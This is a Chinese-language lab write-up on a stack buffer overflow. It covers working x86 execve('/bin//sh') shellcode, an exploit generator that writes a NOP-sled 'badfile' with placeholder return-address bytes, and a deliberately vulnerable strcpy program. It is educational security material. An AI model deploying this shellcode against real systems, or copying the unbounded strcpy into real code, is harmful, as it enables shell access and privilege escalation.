缓冲区溢出-shellcode分析


实验楼项目
shellcode结果就是调用出一个shell
这里的过程是先用exploit生成一个恶意文件,其中有溢出代码(汇编形式)
该文件内容:
12字节空 2字节文件装入内存的地址码,72字节空,然后为shellcode代码和空。
当stack的bug程序运行时,return的地址被覆盖为shellcode的地址,获取权限。

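#include <stdio.h>
#include <unistd.h>

/*
 * Reference program whose disassembly yields the shellcode used later on the
 * page: it replaces the current process with /bin/sh via execve().
 *
 * Fixes over the listing as extracted: the curly quotes around /bin/sh are
 * restored to a C string literal, <unistd.h> is included so execve() has a
 * prototype, and main has the standard int signature. execve() only returns
 * on failure, so reaching perror() means the exec did not happen.
 */
int main(void)
{
    char *name[2];

    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    /* Only reached if execve() failed; report why and exit non-zero. */
    perror("execve");
    return 1;
}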
// 生成汇编码
gcc -o shellcode -ggdb -static shellcode.c
gdb shellcode
disassemble main
// 结果
"\x31\xc0\x50\x68" "//sh" "\x68" "/bin" "\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

生成恶意文件程序exploit

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * Machine code bytes for the execve("/bin//sh") sequence; they correspond to
 * the disassembly of shellcode.c shown earlier on the page. Each line's
 * comment gives the instruction the bytes encode.
 */
char shellcode[]=
"\x31\xc0"    //xorl %eax,%eax
"\x50"        //pushl %eax
"\x68""//sh"  //pushl $0x68732f2f
"\x68""/bin"  //pushl $0x6e69622f
"\x89\xe3"    //movl %esp,%ebx
"\x50"        //pushl %eax
"\x53"        //pushl %ebx
"\x89\xe1"    //movl %esp,%ecx
"\x99"        //cdq
"\xb0\x0b"    //movb $0x0b,%al
"\xcd\x80"    //int $0x80
;

/*
 * Writes the 517-byte file "./badfile" that stack.c reads.
 *
 * What the code below visibly does: fills buffer with 0x90, copies a prefix
 * of 0x90 bytes followed by four "\x??" placeholders to the start of buffer,
 * copies shellcode to offset 100, then writes the whole buffer to the file.
 *
 * Review notes (code left exactly as on the page):
 *  - "\x??" is not a valid hex escape, so this file does not compile as
 *    shown; it is an unfilled template.
 *  - `void main` is non-standard; `int main` is the portable form.
 *  - `memset(&buffer, ...)` passes a char (*)[517]; it works because the
 *    address is the same, but plain `buffer` is the idiomatic argument.
 *  - fopen() is not checked for NULL and fwrite()'s return is ignored, so a
 *    failed open crashes and a short write goes unnoticed.
 */
void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
    strcpy(buffer+100,shellcode);

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

有bug的程序stack.c

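/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Number of bytes read from "badfile"; matches the size exploit.c writes. */
enum { INPUT_LEN = 517 };

/*
 * Deliberately vulnerable function, kept as the lab intends.
 *
 * str is copied into a 12-byte stack buffer with strcpy(), which imposes no
 * length limit: any input longer than 11 bytes plus the terminator writes
 * past buffer into the rest of the stack frame. A corrected version would
 * check the length and bound the copy, e.g.
 * `if (strlen(str) >= sizeof buffer) return 0;` followed by
 * `snprintf(buffer, sizeof buffer, "%s", str);`.
 *
 * Returns 1 unconditionally.
 */
int bof(char *str)
{
    char buffer[12];
    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}

/*
 * Reads up to INPUT_LEN bytes from "badfile" in the current directory and
 * passes them to bof().
 *
 * Fixes over the original listing: a failed fopen() is reported instead of
 * being passed to fread() as NULL, a read error is reported, the stream is
 * closed, and str is zero-filled so bof() never sees uninitialized bytes
 * after a short read. The array size and the exit status (1) are unchanged.
 */
int main(int argc, char **argv)
{
    char str[INPUT_LEN] = {0};
    FILE *badfile;

    (void)argc;
    (void)argv;

    badfile = fopen("badfile", "r");
    if (badfile == NULL) {
        perror("fopen: badfile");
        return EXIT_FAILURE;
    }
    if (fread(str, sizeof(char), INPUT_LEN, badfile) == 0 && ferror(badfile)) {
        perror("fread: badfile");
        fclose(badfile);
        return EXIT_FAILURE;
    }
    fclose(badfile);

    bof(str);
    printf("Returned Properly\n");
    return 1;
}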